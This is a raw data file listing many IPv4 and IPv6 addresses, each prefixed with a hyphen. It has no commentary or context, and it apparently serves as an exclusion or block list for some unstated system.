-174.137.164.171 -182.254.159.174 -138.36.105.191 -119.29.147.172 -173.209.43.92 -185.133.87.27 -147.135.134.165 -139.196.14.118 -106.15.136.97 -118.180.24.25 -116.62.23.45 -184.173.185.76 -149.62.168.171 -149.56.22.188 -107.178.150.97 -104.237.152.166 -128.199.142.130 -198.50.209.136 -103.12.51.53 -172.102.197.177 -162.250.124.68 -95.173.185.113 -5.45.76.82 -209.95.43.99 -94.138.214.197 -123.57.221.124 -123.57.144.183 -103.28.38.64 -192.250.225.107 -188.120.248.18 -156.235.169.13 -203.209.145.248 -85.239.227.3 -183.232.160.115 -192.64.81.206 -118.178.234.126 -209.151.232.196 -101.200.56.128 -159.203.9.86 -77.72.149.110 -202.152.6.173 -42.112.38.111 -104.207.156.187 -114.215.81.239 -23.88.82.107 -121.154.5.68 -91.195.200.73 -47.93.201.129 -2a02:348:91:6346::1 -104.236.58.25 -94.101.80.92 -172.246.196.16 -23.230.19.53 -149.56.221.177 -61.167.37.20 -109.235.64.80 -5.188.63.78 -103.236.223.169 -188.226.140.97 -95.85.25.66 -103.240.213.34 -172.102.197.174 -169.48.125.200 -107.150.49.211 -47.254.192.250 -182.48.68.98 -201.76.4.39 -42.112.30.106 -173.236.25.29 -185.30.238.197 -70.32.80.174 -170.231.83.35 -61.140.21.172 -47.95.20.64 -188.164.197.233 -103.246.219.75 -5.61.35.92 -217.150.94.82 -83.223.106.218 -37.187.57.25 -46.105.47.255 -183.60.218.194 -50.115.137.198 -122.114.36.235 -120.27.152.222 -69.85.87.167 -142.91.241.73 -188.227.228.2 -94.176.239.154 -188.132.251.226 -138.201.138.203 -222.81.22.154 -42.112.16.103 -69.30.55.139 -64.15.67.69 -23.230.19.146 -101.201.79.33 -112.121.189.78 -2a01:4f8:191:7217::2 -1.255.109.16 -199.119.136.200 -116.254.120.231 -112.64.181.166 -168.235.96.139 -162.214.26.143 -67.58.50.73 -111.231.52.138 -2a02:2308::216:3eff:fe70:fe17 -49.50.105.34 -47.74.10.234 -212.68.50.124 -115.29.47.150 -103.240.213.195 -104.238.97.243 -91.229.113.70 -5.135.230.99 -45.61.115.46 -139.59.2.231 -103.215.72.184 -176.58.100.176 -51.254.161.203 -47.90.86.98 -93.170.76.151 -45.124.85.222 -185.164.138.215 -149.202.111.149 -162.245.229.5 -172.107.165.39 -93.191.132.56 -138.197.201.220 -112.124.9.129 -77.92.139.98 -101.200.185.239 -183.61.83.223 -185.122.140.38 -183.64.107.219 -64.6.104.123 -103.240.213.127 -182.92.193.224 -103.202.126.95 -172.247.51.44 -221.234.46.45 -198.2.212.189 -185.129.249.43 -104.223.11.224 -204.74.210.22 -103.240.212.113 -107.163.113.217 -103.71.153.213 -192.159.83.78 -106.15.204.192 -176.31.54.144 -209.250.244.147 -115.28.233.134 -115.28.100.203 -5.178.109.63 -112.74.80.137 -208.118.240.175 -199.182.175.133 -116.255.154.68 -91.215.152.28 -193.238.96.90 -192.154.229.165 -80.188.35.147 -175.122.253.8 -23.225.217.214 -202.6.17.148 -5.178.109.46 -185.149.101.10 -218.32.216.163 -212.47.230.147 -128.199.131.107 -137.74.169.96 -87.230.23.98 -31.210.68.3 -142.4.107.70 -192.121.187.168 -120.26.129.55 -128.199.158.20 -185.7.96.9 -123.97.60.88 -188.132.219.173 -114.108.172.141 -150.95.205.78 -119.23.58.191 -23.238.145.81 -200.54.184.12 -5.39.28.200 -91.231.1.73 -49.212.63.46 -192.69.219.14 -211.196.153.100 -39.108.74.6 -139.162.238.97 -68.169.59.118 -172.252.10.72 -112.124.99.27 -67.229.165.90 -104.207.50.69 -139.91.157.11 -109.201.149.206 -176.108.64.39 -103.68.82.3 -216.107.153.154 -66.171.239.184 -122.9.29.221 -146.185.159.123 -153.121.65.108 -95.130.170.133 -198.178.124.148 -138.197.64.190 -211.115.217.77 -113.10.244.50 -91.224.140.23 -107.167.110.201 -65.60.43.177 -62.220.38.6 -198.200.41.32 -67.229.163.100 -115.146.126.152 -185.56.146.148 -178.33.183.89 -23.230.19.73 -115.84.178.24 -61.160.212.89 -104.236.147.118 -14.0.74.35 -202.77.108.252 -46.21.199.246 -178.62.101.51 -107.152.111.107 -121.43.198.132 -45.61.112.42 -177.125.27.102 -51.254.104.36 -101.69.110.200 -138.128.120.124 -121.40.40.97 -202.129.217.200 -101.200.184.115 -198.50.176.67 -112.121.184.212 -118.122.119.193 -23.224.115.2 -107.178.162.107 -95.211.193.54 -188.166.239.243 -176.74.220.204 -220.165.179.50 -142.44.160.22 -109.235.65.49 -191.252.110.120 -43.229.38.21 -222.186.3.35 -138.201.117.116 -110.81.179.220 -31.220.53.198 -13.231.228.246 -153.122.28.32 -216.107.153.230 -172.85.98.230 -177.200.199.53 -108.160.147.27 -45.55.3.91 -157.7.221.110 -103.200.32.45 -74.206.240.84 -195.210.48.22 -49.50.118.12 -5.56.59.46 -50.115.128.23 -203.13.40.11 -185.13.59.68 -103.240.215.91 -95.213.217.69 -119.29.97.209 -106.57.23.43 -160.16.116.47 -61.157.184.106 -185.164.138.223 -34.232.92.201 -122.114.250.99 -194.44.229.42 -93.17.133.166 -107.178.150.70 -172.246.196.155 -142.91.232.117 -95.213.224.43 -120.31.69.196 -77.237.224.19 -217.198.14.51 -202.146.208.170 -122.9.15.57 -128.199.107.188 -121.15.136.51 -51.15.220.78 -174.127.72.124 -195.190.109.82 -194.14.107.174 -36.37.91.233 -89.208.156.116 -2a02:c207:2004:4945::1 -209.236.120.211 -122.9.22.159 -103.240.215.159 -199.217.119.208 -89.39.13.95 -66.37.25.181 -66.70.250.78 -219.94.242.124 -51.15.146.98 -139.219.189.119 -43.246.209.184 -188.93.210.84 -217.106.238.57 -176.31.36.194 -13.115.178.193 -69.36.182.174 -182.16.121.50 -119.29.110.223 -120.76.228.217 -220.168.18.94 -121.232.192.76 -104.237.53.98 -5.178.109.179 -104.221.169.7 -108.61.149.20 -115.124.98.112 -121.40.115.20 -185.149.101.22 -45.63.91.194 -149.210.169.150 -185.14.29.113 -120.26.46.86 -158.69.227.66 -160.16.196.152 -66.34.174.178 -110.172.221.48 -142.44.201.207 -123.206.65.27 -119.81.236.181 -42.62.18.74 -103.1.206.38 -104.238.111.70 -151.248.121.253 -69.61.20.253 -101.200.91.162 -2a02:c207:2004:8065::1 -139.162.249.245 -163.172.106.235 -124.133.137.35 -80.241.211.55 -144.217.207.159 -139.196.209.150 -2a03:4000:6:707b::6 -185.91.108.190 -208.86.159.244 -115.214.183.20 -133.242.238.104 -13.57.253.85 -66.128.59.192 -121.199.40.68 -123.206.255.136 -2001:2e8:636:0:2:1:0:76 -23.104.135.3 -119.139.32.198 -192.249.87.94 -64.185.234.176 -193.104.254.46 -183.61.131.55 -41.138.49.118 -2a0a:7d80:1:7::95:17 -172.104.27.82 -98.129.37.129 -175.10.11.211 -118.91.233.121 -47.88.7.155 -47.95.239.243 -156.237.179.119 -46.29.2.169 -205.207.184.233 -167.114.48.60 -217.61.130.243 -149.56.124.142 -178.170.217.76 -202.142.146.195 -121.127.248.55 -85.254.126.81 -43.225.64.50 -178.62.195.151 -59.106.191.153 -85.95.237.82 -23.19.22.61 -91.134.228.229 -202.158.64.75 -122.114.20.98 -210.211.127.179 -176.221.37.68 -133.242.228.42 -218.244.150.19 -140.117.69.43 -173.193.49.67 -37.59.56.39 -163.172.60.18 -175.41.251.62 -133.242.199.144 -173.252.192.34 -69.147.241.180 -217.146.203.188 -173.239.30.60 -172.104.99.249 -156.235.171.35 -107.6.184.100 -218.251.227.20 -185.124.84.172 -112.83.192.179 -85.214.211.100 -23.225.89.180 -2401:2500:102:3018:153:126:165:35 -120.27.150.91 -192.81.212.182 -133.242.17.140 -203.198.170.123 -217.147.91.189 -104.193.68.219 -209.200.13.202 -149.202.113.250 -108.161.136.215 -69.195.219.85 -114.201.229.4 -117.79.133.105 -119.28.4.112 -89.163.130.137 -103.240.213.86 -146.185.142.30 -91.222.138.202 -104.232.102.136 -104.207.52.88 -123.60.202.209 -1.56.11.47 -114.215.131.213 -49.212.158.210 -109.236.84.160 -112.233.112.73 -146.185.136.14 -174.137.161.85 -104.128.230.39 -198.61.129.234 -186.46.89.44 -121.40.221.131 -103.205.1.86 -54.252.160.166 -153.120.40.111 -142.4.113.214 -216.107.153.146 -185.48.180.89 -79.172.211.120 -211.155.230.212 -219.234.6.92 -2a03:4900:1:331::2 -198.200.41.47 -184.51.203.40 -201.49.21.70 -45.33.113.34 -185.14.29.112 -103.244.1.52 -101.200.148.38 -77.223.141.244 -51.255.13.49 -61.91.2.104 -121.41.110.197 -185.5.236.108 -86.127.82.117 -74.122.193.195 -117.102.65.178 -212.27.41.37 -69.64.33.207 -91.121.209.162 -54.244.95.86 -211.149.238.33 -178.32.126.70 -123.56.188.128 -45.56.69.230 -150.95.156.131 -45.35.99.181 -62.63.190.28 -108.61.167.3 -198.50.142.168 -45.125.236.155 -122.227.235.75 -217.150.94.69 -187.51.39.22 -52.51.15.251 -104.207.40.177 -118.178.85.236 -219.94.248.129 -112.124.44.10 -45.55.207.158 -217.112.131.170 -149.210.143.128 -91.195.200.79 -92.240.245.7 -122.13.75.4 -157.52.130.158 -173.239.46.151 -132.148.141.236 -197.249.0.218 -80.233.244.43 -192.141.168.143 -204.74.208.109 -128.199.166.9 -217.61.128.127 -139.199.160.74 -192.99.89.152 -108.161.129.76 -91.200.43.177 -101.200.104.65 -45.61.114.17 -160.16.223.193 -213.248.53.95 -153.120.50.213 -173.252.192.62 -64.118.95.204 -62.4.21.36 -119.9.108.193 -178.172.235.172 -45.35.125.41 -115.159.192.82 -121.40.34.249 -185.4.48.107 -219.84.198.177 -118.26.129.211 -76.164.227.82 -67.205.179.229 -103.249.84.96 -104.149.66.131 -220.181.86.37 -144.217.214.222 -119.29.172.142 -38.123.253.114 -75.126.58.132 -5.79.69.84 -103.199.16.190 -5.145.175.174 -121.12.92.56 -36.66.109.227 -27.120.86.136 -93.180.159.175 -174.137.164.176 -43.229.39.31 -74.208.68.144 -103.248.255.236 -185.129.248.132 -103.250.94.249 -211.149.228.136 -213.128.77.67 -198.24.163.227 -5.178.109.99 -68.169.51.169 -67.227.185.56 -79.133.220.81 -47.92.64.159 -217.150.94.85 -172.106.184.25 -52.67.60.13 -153.126.194.74 -202.171.225.128 -103.15.184.11 -192.99.137.49 -149.56.9.31 -185.193.41.15 -173.254.215.38 -149.202.106.34 -113.28.90.250 -103.27.178.88 -172.107.64.12 -104.245.102.69 -128.199.90.180 -39.109.127.95 -118.31.238.156 -115.146.126.51 -51.255.140.23 -139.162.182.38 -158.69.218.182 -218.28.135.21 -70.32.98.236 -118.178.189.156 -23.239.16.65 -104.221.129.108 -23.88.82.54 -81.0.217.231 -1.255.109.144 -5.135.115.26 -195.8.206.129 -46.166.134.127 -158.69.251.187 -49.50.76.216 -188.116.54.65 -139.59.233.103 -123.59.7.130 -137.74.225.113 -217.65.5.86 -202.218.47.206 -89.36.26.216 -173.1.110.179 -162.213.195.92 -69.10.47.51 -115.231.219.85 -95.219.206.209 -120.132.117.132 -122.9.18.169 -107.179.93.56 -153.126.178.177 -173.0.63.182 -149.56.64.87 -194.19.246.34 -172.246.220.70 -52.209.0.15 -172.107.64.26 -120.77.201.6 -5.45.76.89 -173.198.249.13 -50.62.135.151 -178.132.1.96 -147.75.90.225 -112.54.205.237 -200.243.127.142 -216.17.107.39 -123.56.143.23 -162.243.196.246 -200.105.182.108 -182.92.162.166 -43.225.108.66 -192.81.133.45 -185.122.140.92 -185.12.111.200 -35.169.241.33 -118.178.227.21 -62.63.190.33 -104.148.100.108 -45.61.112.10 -103.205.2.74 -120.77.12.162 -104.143.5.197 -150.95.136.127 -91.126.133.109 -107.179.98.111 -67.227.212.68 -104.131.157.9 -195.8.206.143 -54.173.219.138 -1.202.223.116 -192.210.205.73 -172.107.146.141 -177.66.167.74 -85.159.208.136 -122.9.229.156 -58.100.229.24 -103.240.214.227 -216.107.153.142 -122.13.148.77 -120.78.74.228 -82.135.151.193 -142.91.95.162 -163.44.169.39 -103.240.213.171 -212.68.57.67 -208.167.225.233 -91.134.151.85 -156.237.178.158 -116.255.136.113 -123.59.119.100 -207.244.112.81 -109.169.86.243 -23.244.241.253 -91.230.195.141 -211.72.246.192 -125.212.193.9 -163.172.108.57 -185.115.41.50 -162.251.108.42 -54.165.106.90 -217.160.2.131 -104.156.251.207 -213.111.1.162 -162.247.76.168 -103.90.138.209 -54.153.117.80 -51.255.1.173 -121.42.200.30 -23.244.241.198 -112.91.108.156 -49.50.76.199 -188.165.1.192 -50.22.189.32 -195.206.253.10 -120.26.123.86 -119.254.28.50 -194.19.246.79 -185.92.244.211 -159.148.20.118 -178.32.190.83 -91.121.189.74 -125.141.142.166 -120.78.150.82 -91.90.234.6 -210.12.12.71 -64.64.3.37 -108.59.13.149 -112.74.133.241 -23.110.47.242 -61.64.57.134 -89.108.85.23 -156.235.169.17 -89.44.32.131 -120.92.229.146 -67.229.63.112 -121.43.226.189 -45.32.107.221 -54.37.168.152 -136.243.238.84 -185.13.58.6 -174.127.72.125 -50.63.85.220 -49.212.63.25 -50.116.3.145 -122.147.108.176 -221.236.173.157 -194.28.173.67 -87.98.217.6 -27.131.0.69 -217.61.129.231 -119.29.14.87 -41.207.186.202 -104.251.223.145 -180.173.138.90 -38.76.31.203 -188.132.147.69 -115.159.104.122 -173.212.229.182 -222.175.139.164 -158.69.124.124 -107.189.161.84 -103.59.43.62 -104.236.95.208 -104.149.66.156 -62.75.163.14 -212.68.42.101 -74.206.233.145 -2a0a:7d80:1:7::93:2b8 -104.151.236.251 -195.128.49.155 -213.32.44.22 -104.239.173.91 -208.100.13.34 -147.135.206.189 -182.16.85.178 -173.252.249.176 -47.104.93.214 -106.14.132.134 -89.187.145.227 -104.202.185.254 -50.7.90.26 -222.187.253.240 -194.125.236.226 -103.240.215.85 -2a05:22c7:1:203:ec4:7aff:fe59:c3ca -172.246.220.188 -121.40.17.153 -103.240.213.64 -101.200.187.179 -218.21.248.204 -121.41.15.215 -103.240.212.134 -37.97.169.140 -74.206.240.93 -193.111.63.112 -172.106.184.6 -92.63.81.243 -119.23.40.117 -185.12.5.56 -103.35.202.34 -45.55.197.240 -120.92.227.176 -45.114.94.156 -142.91.241.96 -45.42.94.174 -23.88.82.160 -185.104.152.48 -5.178.109.100 -200.14.55.138 -172.107.147.10 -220.181.86.15 -133.18.192.126 -173.239.30.163 -54.159.22.215 -192.163.253.224 -154.56.1.4 -62.100.207.247 -94.23.203.172 -173.249.159.6 -62.210.91.54 -176.31.31.240 -164.70.8.138 -123.56.11.70 -178.170.190.2 -13.229.255.212 -91.134.234.124 -23.110.56.123 -122.9.163.234 -96.44.157.21 -103.205.0.75 -91.198.44.110 -157.7.154.211 -58.221.146.102 -172.110.20.189 -103.205.1.72 -23.225.0.20 -198.235.132.71 -144.217.88.197 -172.104.238.167 -43.230.145.31 -172.246.196.95 -168.144.87.53 -86.127.82.58 -188.165.119.239 -185.86.210.252 -66.171.236.43 -85.206.175.199 -27.155.88.44 -103.240.213.145 -154.56.1.44 -103.53.198.171 -103.90.228.119 -64.15.134.0 -139.199.80.75 -49.212.178.244 -5.196.1.163 -114.55.88.24 -210.59.244.13 -69.64.38.241 -35.167.107.4 -50.57.55.139 -173.236.111.169 -192.241.167.153 -107.178.162.98 -85.119.158.12 -121.199.66.247 -123.56.70.231 -176.31.50.36 -119.23.209.152 -74.82.185.196 -66.55.65.43 -203.77.208.69 -188.132.180.76 -198.58.117.99 -116.62.56.252 -202.171.225.131 -23.110.47.229 -46.101.132.131 -118.178.92.2 -47.52.144.154 -185.162.11.149 -121.40.149.157 -45.61.112.24 -208.117.44.155 -103.230.120.230 -49.50.68.217 -104.224.202.162 -124.43.16.46 -23.88.59.127 -82.135.151.34 -168.235.74.162 -160.16.211.8 -181.29.97.105 -71.19.249.89 -87.98.250.25 -23.225.89.171 -121.42.60.72 -23.230.19.132 -104.243.42.181 -107.161.95.107 -62.76.47.47 -1.234.75.197 -64.237.33.181 -59.175.173.115 -122.9.29.198 -121.40.32.189 -78.108.86.243 -5.178.109.147 -192.186.173.251 -196.201.225.36 -45.79.81.211 -137.74.154.60 -31.28.163.212 -217.199.161.22 -113.196.74.171 -172.247.34.151 -23.229.12.170 -103.240.215.165 -221.132.35.5 -217.182.81.121 -162.248.55.100 -52.88.244.151 -27.0.12.185 -153.127.202.49 -103.240.214.55 -103.56.206.104 -78.24.158.116 -107.178.149.77 -42.117.1.247 -120.24.60.221 -101.55.71.214 -217.160.182.213 -23.254.217.108 -172.246.196.202 -153.122.141.98 -193.33.213.12 -120.132.37.165 -122.9.229.189 -171.244.8.188 -128.199.190.59 -47.92.25.115 -5.178.109.208 -23.230.19.120 -119.136.115.70 -119.82.31.18 -172.252.10.211 -160.16.110.80 -193.0.61.218 -198.50.199.250 -104.238.110.76 -62.63.190.74 -65.19.131.58 -74.117.221.81 -188.225.34.87 -182.48.40.59 -172.247.51.188 -49.212.140.75 -172.246.196.72 -65.60.28.168 -211.95.79.217 -139.162.189.102 -195.2.253.197 -93.190.141.221 -109.235.65.173 -108.170.59.203 -80.86.93.176 -217.150.94.93 -150.95.172.27 -103.193.242.100 -96.47.225.164 -139.59.111.157 -5.254.106.235 -209.58.143.144 -115.68.102.25 -62.63.191.17 -109.206.178.121 -159.203.1.243 -103.239.242.32 -104.236.39.173 -198.200.41.5 -45.77.144.189 -182.163.126.226 -23.111.148.101 -2a0a:7d80:1:9::98:189 -177.85.97.202 -112.126.71.129 -217.61.129.183 -36.55.236.215 -31.28.163.203 -5.39.75.113 -45.122.220.241 -45.77.39.118 -23.238.129.67 -104.236.90.23 -185.25.102.178 -45.252.250.183 -46.17.45.18 -162.209.70.217 -210.211.119.151 -2a03:8180:1001:12::a -192.34.23.104 -188.165.132.158 -95.173.170.45 -111.118.184.59 -202.102.137.42 -91.210.189.121 -47.92.88.55 -103.197.70.41 -159.65.4.36 -47.90.102.54 -172.107.64.7 -47.90.200.62 -107.191.105.17 -66.55.156.139 -185.121.133.31 -198.27.83.169 -120.92.229.213 -67.228.86.106 -104.200.17.254 -182.163.126.192 -122.226.92.218 -177.93.110.17 -37.59.213.72 -23.225.239.115 -89.145.76.109 -185.50.199.49 -164.52.150.232 -83.164.192.251 -199.87.234.59 -166.62.60.83 -72.52.136.71 -209.151.248.233 -106.14.42.66 -23.225.89.153 -65.18.120.19 -189.39.53.68 -172.107.71.25 -23.238.145.89 -174.137.164.156 -142.91.95.95 -156.237.176.199 -139.59.123.252 -94.242.254.149 -79.137.66.40 -211.149.161.142 -96.44.179.251 -23.110.61.82 -150.95.179.133 -114.112.104.19 -27.34.245.99 -185.92.245.80 -95.134.39.207 -41.78.51.1 -91.237.109.45 -31.28.163.200 -104.202.185.39 -107.179.98.100 -58.61.28.116 -54.199.134.63 -91.192.108.20 -23.19.238.59 -149.56.3.84 -89.163.249.204 -67.228.171.211 -103.17.119.171 -184.172.41.104 -37.230.99.200 -172.246.220.96 -159.148.37.98 -133.130.114.23 -89.31.231.7 -64.6.108.193 -198.16.54.35 -2a0a:7d80:1:7::101:cd -122.9.18.186 -79.137.67.126 -23.110.61.83 -109.73.5.76 -222.178.9.234 -50.22.219.230 -185.34.32.28 -77.92.140.26 -185.233.130.246 -178.63.93.60 -119.29.159.170 -103.240.212.243 -122.224.240.66 -103.35.202.164 -180.178.62.2 -104.238.110.114 -209.222.20.150 -103.90.228.7 -154.56.1.29 -5.135.58.95 -212.175.193.164 -89.33.247.31 -107.180.84.40 -45.7.229.207 -125.253.127.241 -205.185.121.237 -104.207.44.121 -62.210.85.41 -66.28.139.134 -172.246.220.179 -174.137.164.137 -172.86.120.172 -108.170.53.102 -149.202.186.210 -139.5.211.29 -218.78.199.101 -183.220.33.233 -185.122.140.90 -104.245.102.89 -66.221.18.203 -112.132.152.130 -118.68.218.96 -195.162.24.106 -103.240.212.161 -195.154.255.139 -125.212.243.98 -172.106.186.59 -122.9.15.38 -78.129.146.58 -23.104.135.233 -62.201.207.69 -192.210.205.76 -202.55.85.206 -174.137.169.252 -178.33.92.197 -203.81.89.251 -77.246.148.215 -154.56.1.60 -183.81.167.170 -193.150.96.12 -91.134.144.13 -139.162.75.101 -210.140.130.11 -157.7.141.157 -172.107.75.199 -46.254.19.194 -69.4.87.50 -91.121.226.224 -173.230.146.212 -117.54.224.7 -107.161.27.180 -172.107.146.168 -182.61.45.233 -74.82.173.130 -222.223.143.107 -172.106.187.195 -46.51.186.180 -188.165.245.79 -37.153.108.73 -101.200.175.89 -165.227.244.99 -139.162.117.93 -69.64.62.44 -173.239.30.150 -144.168.73.139 -176.31.129.173 -79.98.108.51 -41.202.89.187 -85.204.50.31 -198.147.26.27 -113.196.75.44 -186.202.182.148 -217.150.94.243 -86.104.177.52 -116.249.47.156 -178.62.224.151 -87.121.91.252 -217.115.137.193 -142.4.107.224 -172.246.220.161 -45.76.44.48 -103.15.235.53 -128.14.132.254 -156.237.176.206 -185.50.197.139 -139.59.233.164 -139.129.53.32 -104.128.230.38 -37.187.83.102 -122.9.22.153 -125.6.165.84 -218.232.75.157 -187.236.105.208 -101.132.123.245 -198.37.112.25 -103.250.94.243 -91.191.174.52 -178.62.176.81 -198.23.131.205 -104.203.82.122 -58.63.247.57 -210.4.72.126 -54.213.170.33 -5.135.224.44 -67.220.188.100 -192.133.80.234 -139.162.104.86 -194.146.226.140 -80.233.244.93 -123.57.3.161 -209.59.174.4 -115.236.59.233 -204.44.79.111 -74.117.222.24 -217.114.217.236 -146.71.98.227 -45.32.122.89 -178.32.215.199 -120.76.241.16 -92.61.141.3 -65.49.9.165 -149.202.103.232 -103.6.192.105 -123.59.185.102 -148.251.200.177 -23.104.135.227 -13.115.149.53 -112.121.172.165 -109.95.242.80 -2001:8d8:84d:fa00::76:f055 -94.103.100.13 -5.178.109.70 -103.250.94.252 -23.225.89.151 -172.247.51.243 -150.95.174.25 -115.71.239.164 -217.195.123.60 -52.87.181.20 -69.16.237.75 -103.10.170.10 -217.115.10.150 -51.255.61.31 -54.67.40.39 -192.3.52.16 -204.93.61.28 -170.80.89.65 -184.173.221.177 -62.63.191.32 -103.246.219.74 -156.235.171.132 -23.224.115.107 -50.19.60.156 -199.231.64.99 -195.47.196.36 -209.152.174.42 -45.114.94.193 -172.246.196.87 -213.136.92.29 -122.9.229.168 -27.133.136.167 -185.17.181.34 -101.64.233.156 -217.174.252.138 -136.243.239.86 -47.94.92.14 -2a03:8180:1002:b3::100:10 -120.92.228.252 -45.33.76.135 -2001:e42:102:1816:160:16:228:153 -153.126.161.250 -82.146.226.166 -194.204.42.178 -82.135.151.187 -211.155.90.23 -103.104.251.5 -81.12.168.133 -139.162.210.83 -121.40.187.167 -104.207.40.167 -216.107.153.244 -46.105.172.245 -45.76.10.187 -94.23.70.214 -117.48.192.140 -153.126.199.211 -169.47.215.108 -66.55.156.150 -172.106.187.245 -38.130.75.6 -91.224.194.66 -23.224.115.241 -122.114.37.23 -118.244.206.136 -172.107.147.21 -45.76.84.9 -81.21.67.230 -112.74.192.206 -198.210.47.93 -174.138.24.18 -179.190.47.162 -103.246.219.77 -42.121.107.101 -174.137.164.148 -77.78.101.180 -139.196.192.211 -107.178.147.119 -103.17.119.5 -192.99.223.111 -211.149.218.157 -116.196.86.31 -91.142.223.195 -91.201.41.34 -67.229.73.114 -64.64.30.24 -46.105.221.67 -212.92.23.110 -199.223.209.208 -93.187.202.45 -50.22.198.222 -103.43.12.27 -2400:8900::f03c:91ff:fe89:e56b -149.56.83.41 -118.193.167.100 -113.128.214.124 -37.59.107.167 -114.215.131.73 -62.138.2.54 -46.30.46.23 -188.132.222.242 -172.104.183.119 -138.128.124.220 -59.106.237.251 -185.4.48.116 -122.152.202.140 -136.243.156.218 -187.111.0.154 -58.253.72.200 -77.92.144.13 -2600:3c00::f03c:91ff:fe08:92ba -208.93.238.211 -104.149.66.144 -59.151.12.66 -5.178.109.242 -136.0.69.24 -178.21.116.42 -101.255.49.211 -120.76.139.23 -122.9.15.5 -136.0.69.171 -85.93.88.172 -45.76.182.78 -202.90.158.12 -194.68.188.137 -107.179.98.102 -66.171.238.137 -157.52.130.157 -159.253.133.229 -120.92.230.132 -191.252.74.12 -95.128.131.181 -168.235.85.199 -204.197.253.198 -120.77.200.68 -103.240.213.138 -23.224.115.156 -166.62.56.46 -172.247.51.103 -172.104.40.29 -178.170.102.199 -104.202.185.154 -120.25.248.115 -51.255.82.15 -103.28.38.60 -154.61.34.42 -120.78.216.141 -94.130.53.60 -93.115.31.99 -103.213.251.85 -35.154.214.150 -149.62.170.107 -37.59.146.78 -119.9.107.160 -176.62.8.39 -119.29.11.43 -31.28.163.222 -101.78.241.237 -185.28.108.165 -103.205.1.103 -157.7.210.146 -23.238.176.208 -153.35.195.66 -216.107.153.185 -203.25.227.183 -31.28.166.250 -42.121.122.197 -103.16.181.26 -217.150.94.6 -66.228.36.74 -192.241.204.194 -172.87.197.211 -5.254.101.212 -213.132.211.83 -52.68.8.157 -62.63.190.79 -188.165.24.158 -179.127.180.110 -67.225.206.220 -119.29.24.197 -88.99.237.81 -34.210.145.249 -52.74.15.145 -109.169.76.37 -49.212.136.83 -159.148.192.230 -168.235.89.44 -123.57.12.31 -121.40.55.13 -35.197.129.215 -85.118.233.75 -2a01:e35:8bef:250:211:32ff:fe22:68 -137.74.154.99 -150.95.131.134 -82.146.39.25 -122.9.29.197 -112.215.22.13 -58.64.190.244 -45.35.99.141 -110.164.69.101 -155.94.205.208 -192.169.156.74 -172.107.71.21 -2a0a:7d80:1:7::100:2e -91.134.178.245 -209.239.115.174 -112.103.196.209 -207.154.209.159 -121.40.92.102 -103.213.251.124 -103.240.214.40 -199.119.141.43 -93.115.31.96 -156.67.218.5 -158.69.19.1 -154.60.101.226 -96.44.167.108 -104.207.50.101 -43.243.248.49 -150.95.142.165 -186.1.25.230 -216.17.111.241 -74.208.97.27 -2a0a:7d80:1:7::105:1e8 -216.17.105.235 -216.70.104.41 -61.233.195.151 -159.89.32.175 -23.224.115.17 -45.77.44.164 -159.89.193.255 -185.233.130.244 -37.59.213.71 -2a0a:7d80:1:7::105:37e -103.16.168.34 -131.161.175.243 -172.106.184.19 -38.106.217.140 -222.173.23.42 -149.13.154.90 -109.254.251.253 -174.37.242.10 -77.232.241.112 -115.29.144.240 -5.45.78.65 -103.90.137.161 -103.37.85.51 -2001:48a8:68f7:1::60 -37.58.85.29 -50.22.159.168 -186.3.70.142 -66.226.72.63 -216.131.114.185 -5.39.13.253 -45.32.219.34 -104.131.95.230 -159.89.20.141 -120.92.230.196 -156.235.170.5 -184.173.138.229 -172.106.184.29 -2600:3c03::f03c:91ff:fee0:498a -162.254.191.60 -50.28.37.125 -107.154.51.99 -85.235.217.100 -174.137.161.82 -109.123.210.246 -188.225.33.122 -2a02:c207:0:2432::1 -194.187.96.77 -129.74.223.85 -106.14.199.242 -200.37.140.130 -66.228.38.206 -47.94.83.87 -112.78.4.25 -103.240.214.33 -2a0a:7d80:1:7::92:38 -117.40.196.184 -2001:690:2100:1::ebc7:21d7 -159.89.201.66 -182.92.187.239 -173.214.110.229 -194.12.229.109 -120.192.58.189 -120.24.243.176 -100.43.129.76 -185.18.196.244 -78.108.91.120 -85.95.239.183 -194.71.144.111 -80.77.95.4 -37.252.96.153 -91.220.43.71 -162.251.180.33 -2a0a:7d80:1:7::93:d4 -154.56.1.51 -202.146.218.161 -159.89.207.119 -149.56.41.121 -82.222.171.248 -202.55.156.3 -162.243.201.77 -59.153.63.23 -51.254.191.130 -211.245.31.132 -134.119.161.248 -206.190.153.83 -185.178.184.188 -114.55.66.219 -193.230.189.200 -47.92.146.242 -122.53.180.50 -208.167.226.45 -162.247.232.20 -66.55.65.24 -139.165.32.30 -172.246.220.91 -222.255.237.64 -2a0a:7d80:1:7::101:29a -45.58.55.52 -47.94.39.123 -45.77.1.124 -58.84.55.156 -42.159.201.103 -186.1.181.98 -150.95.155.101 -2a0a:7d80:1:7::100:61 -5.153.22.92 -47.93.199.177 -159.89.200.117 -104.203.82.113 -91.229.44.254 -103.48.7.16 -103.249.100.45 -104.221.129.110 -104.128.230.40 -5.160.219.56 -2a01:7e00::f03c:91ff:fe28:76de -120.77.170.54 -159.89.197.186 -159.89.44.153 -66.171.239.177 -178.62.244.91 -91.230.191.32 -107.154.51.98 -67.227.210.213 -173.255.234.121 -172.246.196.10 -172.246.220.117 -98.159.42.106 -23.23.224.148 -2a02:c207:0:2495::1 -217.168.153.181 -208.167.225.107 -54.163.229.219 -45.32.16.154 -112.78.6.134 -103.53.169.134 -142.91.95.8 -2600:3c00::f03c:91ff:feb0:3eff -2a02:348:6f:6164::1 -122.9.18.149 -119.28.179.162 -47.90.10.122 -65.49.9.81 -89.46.91.159 -91.229.23.89 -198.82.185.36 -123.31.29.75 -46.166.162.89 -193.136.128.141 -49.212.27.188 -103.48.81.10 -2600:3c03::f03c:91ff:fe59:c496 -165.227.213.193 -72.29.27.231 -50.97.71.227 -47.89.9.55 -2001:e42:102:1514:160:16:76:235 -194.146.225.188 -89.105.211.25 -113.196.233.168 -45.33.59.212 -153.126.213.178 -122.9.22.185 -104.238.132.253 -104.202.185.176 -209.8.5.181 -39.108.62.185 -58.229.184.58 -49.212.152.21 -18.144.24.186 -51.218.216.146 -85.254.126.54 -103.83.179.9 -23.227.129.22 -45.61.113.5 -192.99.93.182 -178.20.158.74 -45.61.115.47 -23.253.5.26 -125.253.127.188 -153.126.129.193 -159.89.240.178 -160.16.216.39 -122.13.195.35 -216.131.64.172 -62.15.33.87 -194.226.171.132 -162.243.250.87 -125.253.127.104 -2001:a10:22:c1::25 -68.68.104.228 -119.29.193.253 -115.28.27.236 -212.68.46.17 -121.42.139.240 